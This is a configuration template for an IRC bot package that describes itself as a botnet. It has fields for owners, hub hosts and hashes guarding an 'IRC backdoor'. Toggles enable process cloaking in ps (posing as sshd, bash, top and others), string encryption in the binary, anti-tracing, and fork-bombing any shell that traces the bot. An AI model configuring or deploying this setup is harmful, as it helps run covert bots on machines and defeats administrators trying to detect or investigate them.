/* The < && > indicates the area you must change! * Do not leave the <> */ /* PACKNAME: name of the pack */ PACKNAME /* HASHES * These must remain 100% secure/private, these keys can retrieve the salts, and * the entire botnet could be hijacked, a pass 8 chars or more is suggested */ /* SHELLHASH: 32 char md5 hash used for binary password * in mIRC: //echo -a $md5(SOMEWORD) * URL: http://edge.codebin.dk/md5.php */ SHELLHASH /* BDHASH: 32 char MD5 hash used for IRC backdoor # NOTE: Botlink uses this for linking, if it is changed on a bot, it wont link to another bot unless # the other bot has the same bdhash. (Protects your botnet, trust me) */ BDHASH /* DCCPREFIX: 1 char cmd prefix for dcc. (ie, .cmd or !cmd) */ DCCPREFIX <.> /* The settings below can each be defined multiple times */ /* OWNER * Multiple OWNER lines may be defined, each will be added as a +a perm owner. * nick: nickname what else? * password: initial password for user * host: hosts of the user (list as many as needed) */ OWNER /* OWNEREMAIL: email addresses that status/errors will be sent to when needed * list as many as needed */ OWNEREMAIL /* HUB * Hubs are ranked by the order they are listed (previously was hublevel in settings.c) * nick: nick of hub * host: hostname or ip of hub (A 'dynamic' OR 'changeable' HOSTNAME IS RECOMMENDED) * port: port the hub listens on * ident: ident of the hub (list as many as needed) */ HUB /* DEFINES * Simply use a '+' to enable a feature, be sure to include the space. * If this is the template pack.cfg, defines are set to their recommended values */ + ANTITRACE This will quit the bot if tracing is detected + AUTHCMDS Enable a special list of cmds to be used after Authing. + AUTHHASH Require a script to AUTH (using hashes) + AUTOAWAY Random autoaway/return on IRC - AUTOLOCK Will lock channels upon certain conditions + CONFEDIT Crontab -e style config editor + DCCAUTH Require Auth hashing with scripts for dcc party line. + DCCPASS DCC command passwords + GARBLESTRINGS Encrypt strings in binary + HIJACKCHECK Checks for a common process hijacker method + LASTCHECK Checks every few seconds for logins with `last` - MESSUPTERM Fork bombs shells that trace the bot on startup + MSGCMDS Adds support for non-auth msg cmds, customizable throgh cmd_config - NAZIPASS Requires a 'special' char in passes..If you have AUTH enabled, this is unneeded + NODELAY Speeds up tcp sockets to server - PROCESSCHECK Checks running processes against a bad-list + PROMISC Checks for sniffers running on the server + PSCLOAK Cloaks the process for `ps` (can be disabled in botconfs) + RANDSERVERS Randomizes the server list per bot + SPLITHIJACK Cycle channels on split; CHANFIX/TS fixes + UTCTIME Uses GMT/UTC standard time instead of localtime /* PSCLOAK * name: the name of the program to spoof as in 'ps' * list as many as needed * A default list is provided */ PSCLOAK -bash PSCLOAK ftp PSCLOAK /usr/sbin/sshd PSCLOAK man PSCLOAK pine PSCLOAK bash PSCLOAK top PSCLOAK last PSCLOAK w PSCLOAK ps ux PSCLOAK bash PSCLOAK ./psybnc PSCLOAK BitchX /* SALTS: DO NOT TOUCH BELOW THIS LINE */